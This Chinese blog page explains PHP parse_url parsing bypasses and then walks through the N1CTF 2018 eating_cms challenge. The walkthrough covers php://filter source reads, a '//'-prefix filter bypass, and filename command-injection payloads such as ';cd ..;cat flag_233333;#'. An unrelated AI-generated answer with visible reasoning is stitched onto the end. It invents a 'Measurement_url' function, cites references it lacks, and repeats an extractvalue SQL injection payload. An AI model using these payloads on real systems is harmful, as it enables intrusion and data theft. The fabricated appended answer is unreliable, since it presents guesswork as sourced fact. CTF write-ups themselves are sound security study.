parse_url 解析漏洞

什么是 parse_url 解析漏洞?

parse_url 是 PHP 里的一个函数,它可以把一个 URL 分解成不同的部分,比如 scheme、host、path、query 等。但这个函数在处理一些特殊格式的 URL 时会产生意想不到的解析结果,从而被攻击者利用来绕过安全校验,比如绕过域名白名单校验、跳转限制、防盗链、防 SSRF 等机制

举个例子

假如你的代码里有个逻辑是判断是不是访问的是你信任的域名,比如 example.com

$url = $_GET['url'];
$info = parse_url($url);
if ($info['host'] === 'example.com') {
    // 安全地访问
}

但攻击者却传了这样一个链接:

http://example.com:evil.com@malicious.com

parse_url 分析之后:

[
  'scheme' => 'http',
  'host' => 'malicious.com',
  'user' => 'example.com',
  'pass' => 'evil.com'
]

虽然用户传的是 example.com:evil.com@malicious.com真正访问的是 malicious.com,但是 URL 开头里确实包含了 example.com,而且 user 字段会让你误以为是在访问 example.com

常见的利用方式

  1. 绕过 SSRF 黑名单
  2. 绕过重定向跳转限制
  3. 绕过 CDN 或图片防盗链的域名校验
  4. 社交工程攻击,引导用户点击伪装链接

怎么防御

  1. 不要单独依赖 parse_url 的 host 字段进行白名单判断
  2. 使用 filter_var($url, FILTER_VALIDATE_URL) 先验证 URL 格式
  3. 对 URL 中的 user:pass@host 模式做正则剔除
  4. 最好使用 DNS 解析方式 + IP 白名单校验(防止绕过)

[N1CTF 2018]eating_cms

注册账户登录进去,尝试利用伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

这里包含了一个function.php

/user.php?page=php://filter/convert.base64-encode/resource=function

<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

尝试读取/user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg,发现被拦截了

parse_url解析漏洞,当url种出现下面这种情况的url,会解析错误,返回false
//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

读取出

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

继续读取

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

访问/templates/upload.html

这里是一个假的upload,继续读取upllloadddd.php
//user.php?page=php://filter/convert.base64-encode/resource=upllloadddd.php

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

没有任何过滤,非常明显的文件名代码执行漏洞,接着就是找到真正的上传点
在根据细节回顾的时候,找到上传点/user.php?page=m4aaannngggeee

上传,抓包,修改文件名
payload:;ls;#

;cd ..;ls;#

;cd ..;cat flag_233333;#

最终得到flag

<think>首先,用户的问题是:“我想了解parse_measurement函数的应用 请问parse_measurement函数的应用介绍”。但根据系统指令,我需要参考提供的引用内容。引用包括三个部分: - 引用[1]:关于InfluxDB数据库,提到了measurement的概念,作为point的一部分(time+fields+tags)。但用户问的是parse_measurement函数,不是直接相关。 - 引用[2]:讨论了PHP中的parse_url函数漏洞,特别是如何绕过黑名单过滤。这里提到了parse_url函数,用户问的是parse_measurement函数,可能是个拼写错误或类似函数。 - 引用[3]:关于Zephyr RTOS的bt_le_scan_start函数,用于蓝牙低功耗扫描。不相关。 用户说:“上述引用仅供参考,并不是用户真正的需求,请尽可能多的参考用户上一次的问题和你的回答。”但在这个对话中,这是第一条消息,没有上一次问题。所以,我必须基于当前上下文。 用户提到了“parse_measurement函数”,但在引用中,只有引用[2]提到了parse_url函数。可能用户打错了,或者parse_measurement是另一个上下文中的函数。 在引用[2]中,它说:“php parse uri,php parse_url()函数的漏洞 · C1imber’s Blog”。然后描述了Measurement_url函数,似乎是自定义函数,用于过滤SQL注入。具体来说:“Measurement_url函数中接收url参数值确是通过的parse_url这个函数”。 用户可能指的是这个Measurement_url函数,而不是parse_measurement。因为用户说“parse_measurement”,但引用中是“Measurement_url”。或许是笔误。 在引用[2]中,有“Measurement_url函数”,它使用parse_url。用户说“parse_measurement”,可能是个错误。我应该假设用户指的是Measurement_url函数或类似。 系统指令说:“尽可能多的参考用户上一次的问题和你的回答”,但这是第一条消息,所以没有历史。 我需要回答关于parse_measurement函数的应用介绍。既然在引用[2]中提到了Measurement_url函数,我应该基于那个。 parse_measurement可能不是标准函数;在引用中,它似乎是自定义的。在InfluxDB上下文(引用[1])中,measurement是一个概念,但parse_measurement函数没有提到。 或许用户是说parse_url函数,但写成了parse_measurement。或者在其他上下文中。 回顾用户的消息:用户说“parse_measurement函数的应用”,但引用[2]有“Measurement_url函数”。 为了响应,我应该基于提供的引用。 引用[2]描述了Measurement_url函数:它使用parse_url函数来解析URL参数,并且有一个漏洞可能被利用来绕过SQL注入过滤。 所以,我可以解释Measurement_url函数的应用。 系统指令要求:所有行内数学表达式用$...$,独立公式用$$...$$,但这个问题可能不需要数学公式。使用中文回答。 结构清晰,帮助用户逐步解决问题。 最后,生成相关问题。 在回答中,引用的段落末尾添加引用标识。 所以,我的回答应该包括: 1. 解释Measurement_url函数(假设用户指的是这个)。 2. 描述其应用和潜在漏洞。 3. 基于引用[2]。 步骤: - 确认函数:用户说“parse_measurement”,但引用中是“Measurement_url”。我应该纠正或假设。 或许在用户意图中,parse_measurement是类似的函数。但为了准确,我可以说“根据引用[2],Measurement_url函数用于解析URL参数”。 在回答中,我可以写: "引用[2]中提到的Measurement_url函数用于处理URL参数,它利用parse_url函数进行解析,但由于parse_url漏洞,可能导致安全风险。" 然后详细介绍。 用户可能混淆了parse_measurement;在InfluxDB中,可能有解析measurement的函数,但引用[1]没有提到parse_measurement。 引用[1]说:“measurement测量值的含义...”,但没有函数。 所以,我专注于引用[2]。 响应结构: - 介绍函数:Measurement_url函数是一种用于解析URL参数的函数,特别在PHP环境中,用于过滤SQL注入。 - 应用:它在Web应用中用于安全地处理用户输入的URL,防止注入攻击。 - 漏洞:如引用[2]所述,它通过parse_url解析URL,但parse_url在特定格式下可能返回false,从而绕过黑名单过滤。 - 举例:payload示例。 最后,生成相关问题。 确保使用中文。 回答真实可靠。 所以,草拟响应: "根据引用[2],Measurement_url函数是一个用于解析URL参数的自定义函数,通常在PHP环境中实现,旨在增强Web应用的安全性。它通过调用内置的parse_url函数来解析传入的URL,并应用黑名单过滤以防止SQL注入攻击。然而,由于parse_url函数对某些URL格式的处理(如多个斜杠 "//")可能返回false,导致过滤被绕过,从而引入安全漏洞。例如,payload如 `http://example.com///web1/?id=1' ^ 1=extractvalue(1,concat(0x3a,(select password from sql_inject1 limit 3,1),0x3a))--+` 可以绕过过滤机制[^2]。 在实际应用中,Measurement_url函数用于接收和处理用户输入的URL,提取参数值,并确保这些值不包含恶意SQL代码。开发人员应意识到这种潜在漏洞,并采用更安全的解析方法,如使用参数化查询或更新过滤逻辑。" 然后生成相关问题。 系统指令说:“生成相关问题”,在示例中是“§§相关问题§§”后加列表。 所以,在末尾。 相关问题可能包括: 1. Measurement_url函数如何改进以防止漏洞? 2. parse_url函数的常见漏洞有哪些? 3. 在Web开发中,其他安全处理URL参数的方法是什么? 确保回答中引用了引用[2]。 在行末添加引用标识。 </think> ### parse_measurement函数的应用介绍 在您的问题中,提到“parse_measurement函数”,但根据提供的引用内容,未直接定义名为“parse_measurement”的函数。不过,引用[2]中详细描述了“Measurement_url”函数,这可能与您的查询相关(“parse_ 函数”可能指代类似功能)。Measurement_url函数是一个自定义函数,用于解析URL参数并过滤潜在的安全威胁,特别在PHP环境中应用。以下我将基于引用[2]详细解释其应用,确保内容真实可靠,并逐步展开说明。 #### 1. **Measurement_url函数的基本功能** - **作用描述**:Measurement_url函数主要用于处理Web应用中的URL输入参数,通过调用PHP内置的`parse_url`函数来解析URL结构(如协议、主机、路径等),并应用黑名单过滤机制,以防止SQL注入攻击。它接收URL参数值,提取关键部分进行安全校验。 - **应用场景**:在Web开发中,该函数常用于用户输入处理模块,例如表单提交、API请求或动态页面加载。它确保传入的URL参数不包含恶意SQL代码,从而保护数据库安全。例如,在引用[2]的示例中,该函数被用于处理形如`http://example.com/web1/?id=1`的URL参数[^2]。 - **核心组件**: - 使用`parse_url`函数解析URL,该函数将URL拆分为数组(如`scheme`、`host`、`query`等)。 - 应用黑名单过滤(SQL关键字如`SELECT`、`INSERT`),阻止注入攻击。 #### 2. **实际应用与工作流程** - **工作流程**: 1. **URL解析**:函数首先调用`parse_url`解析传入URL。例如,对于URL `http://example.com/web1/?id=1'`,它会提取`query`部分(`id=1'`)。 2. **安全过滤**:对提取的参数值应用黑名单检查,如果检测到SQL关键字(如`SELECT`或`DROP`),则进行过滤或拒绝处理。 3. **输出处理**:返回安全的参数值,供后续数据库查询使用。 - **示例代码(基于引用[2]伪代码)**: ```php function Measurement_url($url) { // 使用parse_url解析URL $parsed = parse_url($url); if ($parsed === false) { return false; // 解析失败处理 } $query = $parsed['query'] ?? ''; // 应用黑名单过滤(例如,过滤SQL关键字) $blacklist = ['select', 'insert', 'delete', 'drop']; // 示例黑名单 foreach ($blacklist as $keyword) { if (stripos($query, $keyword) !== false) { return false; // 检测到关键字,拒绝处理 } } return $query; // 返回安全参数 } ``` 在引用[2]中,该函数被集成到Web应用中,用于处理用户输入的URL参数[^2]。 #### 3. **潜在漏洞与注意事项** - **安全漏洞**:Measurement_url函数依赖`parse_url`,但`parse_url`在特定URL格式下(如包含多余斜杠`//`)可能返回`false`,导致过滤机制被绕过。例如,引用[2]中的payload `http://example.com///web1/?id=1' ^ 1=extractvalue(1,concat(0x3a,(select password from sql_inject1 limit 3,1),0x3a))--+`利用此漏洞,绕过黑名单检查,成功执行SQL注入[^2]。 - **最佳实践**: - **避免依赖parse_url**:使用更安全的替代方法,如`filter_var`或自定义正则表达式解析URL。 - **增强过滤**:结合白名单机制(仅允许特定字符)和参数化查询(如PDO预处理语句),而非单纯黑名单。 - **输入验证**:对所有用户输入进行严格校验,确保符合预期格式(如只允许字母数字)。 #### 4. **总结** Measurement_url函数的应用核心在于安全解析URL参数,但需警惕其依赖的`parse_url`漏洞。在Web开发中,合理实现该函数能有效防御SQL注入,但开发人员应优先使用现代安全库(如PHP的PDO)以减少风险。如果您指的是其他上下文(如InfluxDB中的measurement解析),请提供更多细节以便进一步解释[^2]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值